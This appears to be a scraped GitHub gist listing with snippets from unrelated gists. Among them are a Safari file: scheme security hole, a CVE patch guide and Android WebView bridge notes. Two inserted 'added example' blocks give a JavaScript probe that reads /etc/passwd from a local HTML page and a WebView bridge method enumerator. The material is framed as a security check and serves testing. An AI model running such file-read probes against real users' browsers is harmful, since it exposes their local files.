David Weinstein dweinstein

yrp604 /
Last active Mar 29, 2017
Safe Stack Notes

Note: I've only briefly read the related CPI paper (PDF); these are just initial impressions after playing around with it a bit.

All the code and binaries I used can be downloaded here. Note that I removed -D_FORTIFY_SOURCE=2 to make the examples a bit simpler.

-fsanitize=safe-stack basically seems to move stack-based buffers off the actual stack, onto another segment of memory (I'll call it the fake stack). The actual stack then stores references to this segment. For example:

char buf[20];
printf("%p\n", buf);  /* under -fsanitize=safe-stack this address lands on the separate ("fake") stack, not the regular one */
dweinstein / LICENSE
Last active Mar 30, 2016
mega rename class based on source, etc.
The MIT License (MIT)
Copyright (c) 2015 David Weinstein
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
dweinstein /
Last active Mar 24, 2016
EHCI Extension Pack, USB, VirtualBox

So I learned two things about USB on VirtualBox (OS X):

  1. it sucks
  2. it sucks less if you enable the extension pack for EHCI:
  • w/out EHCI I could not install a 28 MB APK from within boot2docker. Maybe if I was willing to wait long enough, but AFAICT it would not complete.

± % docker run --privileged -v=/dev/bus/usb:/dev/bus/usb --rm -t -i -v "$(pwd)":/provision analysis /bin/bash

  • w/out EHCI
ralphtheninja /
Last active Jul 2, 2019
Use JOBS=max to speed up native node modules

When npm installs native node modules it uses node-gyp to compile code. This is the seam node uses for targeting different operating systems, e.g. OS X, Linux, Windows, etc.

By default node-gyp compiles using one core and if you have more than one you probably want to utilize that power to speed up compile time. The way node-gyp handles this is by using the JOBS environment variable, which sets the jobs variable here. This piece of code then checks the value of jobs to determine how many cores to use.

Note that if the value of JOBS is max then all cores will be used. So let's try this on leveldown. First, let's check that JOBS isn't set yet:

lms@ux301|01:34|~/src/leveldb-repos/leveldown (master) $ echo $JOBS

rongarret / gist:d8987c9cd57bd768e1de
Last active Aug 29, 2015
Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access restrictions for XMLHttpRequests on FILE: scheme URLs. As a result, any HTML file on the local file system that is opened in Safari can read any file that the user has access to (and, of course, it can upload those files too). Here's a little proof-of-concept. Copy and paste this into a local HTML file and open it in Safari. It will display the contents of /etc/passwd.
<script src=></script>
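The script the gist loads is not shown above, so here is an added example (not the gist's own code) that turns the same idea into a check: open a page from a file: URL, issue a synchronous XMLHttpRequest for another local file, and report whether the browser refused or handed the bytes back. The helper names (probeFileRead, summarizePasswd, runProbe) and the two fake XHR constructors are assumptions of this example; the passwd sample used with them is constructed.

```javascript
// Added example: probe whether a file: page may read other local files via XHR.
// Helper names are assumptions of this example, not part of the original gist.

// Synchronous GET so the outcome is known before the function returns.
// A browser that gives file: pages a unique/null origin throws a SecurityError
// (or NetworkError) from open()/send(); a browser that does not returns the
// file's contents with status 0, which is what the gist describes for Safari.
function probeFileRead(XhrCtor, url) {
  var xhr = new XhrCtor();
  try {
    xhr.open('GET', url, false);
    xhr.send(null);
  } catch (e) {
    return { url: url, readable: false, reason: (e && e.name) || String(e) };
  }
  var body = xhr.responseText || '';
  if (body.length === 0) {
    return { url: url, readable: false, reason: 'empty response (status ' + xhr.status + ')' };
  }
  return { url: url, readable: true, body: body };
}

// Reduce a passwd file to its account names so a report can show that the
// file was read without echoing every field.
function summarizePasswd(text) {
  return text.split('\n')
    .filter(function (line) { return line && line.charAt(0) !== '#'; })
    .map(function (line) { return line.split(':')[0]; });
}

// Browser entry point: uses the real XMLHttpRequest when one exists and
// writes a one-line verdict into the page.
function runProbe(url) {
  if (typeof XMLHttpRequest === 'undefined') {
    return { url: url, readable: false, reason: 'no XMLHttpRequest in this runtime' };
  }
  var result = probeFileRead(XMLHttpRequest, url);
  var msg = result.readable
    ? 'READABLE: ' + url + ' (accounts: ' + summarizePasswd(result.body).join(', ') + ')'
    : 'blocked: ' + url + ' (' + result.reason + ')';
  if (typeof document !== 'undefined' && document.body) {
    document.body.appendChild(document.createTextNode(msg));
  }
  return result;
}

// Fake XHR constructors (constructed for this example) so the classification
// can be exercised outside a browser: one that enforces an origin check, one
// that leaks the file like the behaviour the gist reports.
function makeDenyingXhr(errName) {
  return function () {
    this.open = function () { var e = new Error('denied'); e.name = errName; throw e; };
    this.send = function () {};
  };
}
function makeLeakyXhr(contents) {
  return function () {
    var self = this;
    this.status = 0;            // file: responses carry status 0
    this.responseText = '';
    this.open = function () {};
    this.send = function () { self.responseText = contents; };
  };
}
```

Paste the block into a local HTML file followed by `runProbe('file:///etc/passwd')`; a browser that enforces file: origin isolation should report "blocked" with a SecurityError, and anything else means a local HTML file can read and exfiltrate the user's files.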
View gist:849eb63d28f7e7bb8c97
var test = require('tape');
var bytewise = require('bytewise');
var encode = bytewise.encode;
var MIN = bytewise.MIN;
var MAX = bytewise.MAX;
test('tuple queries', function (t) {
var yearly = tuples('reports', 'yearly');
// component keys of the tuple space query are available by index
Fuzion24 /
Last active Sep 25, 2015
Patching CVE-2015-1474 -- Remotely exploitable graphics buffer overflow on my Nexus device (N5 5.0.1)

This is a brief guide on how I patched CVE-2015-1474 for my Nexus 5 - 5.0.1. This involves downloading and building AOSP with the patch for the vuln applied. I have attached a pre-built patched version of libui for the Nexus 5 5.0.1 in case you are too lazy to build it yourself (and you trust me).

Building patched libui for your nexus device

repo init -u -b android-5.0.1_r1
repo sync -j16

cd frameworks/native
git cherry-pick 2bc5e811a817a8c667bca4318ae98582b0ee6dc6
View agnoster-custom.zsh-theme
# vim:ft=zsh ts=2 sw=2 sts=2
# agnoster's Theme -
# A Powerline-inspired theme for ZSH
# In order for this theme to render correctly, you will need a
# [Powerline-patched font](

Android 5.0

I/chromium( 6890): [INFO:CONSOLE(37)] "AddJavascriptInterface: top[Android]: com.WebAppInterface@3847a08c - 
error: Access to java.lang.Object.getClass is blocked", source: http://[REDACTED].com/ (37)

For applications targeting Android >= 5.0, you can enumerate the methods available from inside JavaScript. "Enumeration of methods will be enabled for applications targeting API levels newer than KitKat (to preserve compatibility with older apps)."
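As an added example (not from the gist above), this is the enumeration a tester would run from page JavaScript against an addJavascriptInterface bridge such as the top[Android] object in the log line: collect every function the bridge exposes and flag whether java.lang.Object.getClass is among them. The helper names (listBridgeMethods, describeBridge, describeGlobalBridge) and the fake bridge objects are assumptions of this example.

```javascript
// Added example: enumerate the methods an injected Java bridge exposes.
// Names are assumptions of this example; the fake bridges are constructed.

function listBridgeMethods(bridge) {
  var seen = {};
  var names = [];
  function add(name) {
    if (!seen.hasOwnProperty(name) && typeof bridge[name] === 'function') {
      seen[name] = true;
      names.push(name);
    }
  }
  // Bridge implementations surface methods through different paths: some
  // answer for...in via a named-property interceptor, others define them as
  // own properties, possibly non-enumerable. Try all three and merge.
  for (var k in bridge) { add(k); }
  Object.getOwnPropertyNames(bridge).forEach(function (n) { add(n); });
  Object.keys(bridge).forEach(function (n) { add(n); });
  return names.sort();
}

function describeBridge(name, bridge) {
  var methods = listBridgeMethods(bridge);
  return {
    name: name,
    methods: methods,
    // getClass is the java.lang.Object method the log line shows being
    // blocked; flag it so a review can see whether the bridge restricted it.
    exposesGetClass: methods.indexOf('getClass') !== -1
  };
}

// Look a bridge up by name on the global object (window in a WebView) and
// describe it, or return null when nothing was injected under that name.
function describeGlobalBridge(root, name) {
  var bridge = root[name];
  if (bridge === null || bridge === undefined) {
    return null;
  }
  return describeBridge(name, bridge);
}

// In a WebView: JSON.stringify(describeGlobalBridge(window, 'Android'))
```

Run `describeGlobalBridge(window, 'Android')` from the page (or via the remote debugger) in a WebView targeting API 21+; on apps targeting KitKat or older the loops return nothing even though the methods are still callable by name.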

kacole2 / CSS
Created Nov 3, 2014
Phonegap Cordova Geolocation with Google Maps Javascript API v3
* {
-webkit-tap-highlight-color: rgba(0,0,0,0); /* make transparent link selection, adjust last value opacity 0 to 1.0 */
}
html, body {
width: 100%;
height: 100%;
padding-top: 10%;